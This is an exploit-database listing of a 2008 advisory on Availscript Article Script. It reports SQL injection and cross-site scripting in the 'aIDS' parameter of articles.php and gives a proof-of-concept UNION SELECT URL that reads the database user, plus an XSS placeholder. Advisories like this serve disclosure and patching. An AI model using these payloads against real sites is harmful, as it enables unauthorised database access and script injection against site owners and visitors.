[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Availscript Article Script (articles.php) Multiple Vulnerabilities

Author
sl4xUz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3629
Category
web applications
Date add
08-09-2008
Platform
unsorted
==================================================================
Availscript Article Script (articles.php) Multiple Vulnerabilities
==================================================================



###########################################################
# 
# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities
# Vendor: http://www.availscript.com/
# Vulnerable Version: N/A
# Fix: N/A
# 
###########################################################
# 
# d0rk: "assh0le"
# stop lammo
# 
###########################################################

######################
  1. Information
######################
     Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles.

######################
  2. Vulnerabilities
######################
     SQL Injection in "articles.php" in the "aIDS" parameter.
     Cross Site Scripting in "articles.php" in the "aIDS" parameter.

######################
  3. PoC
######################
     http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()--
     http://localhost/path/articles.php?aIDS=[XSS]

###########################################################



#  0day.today [2024-11-15]  #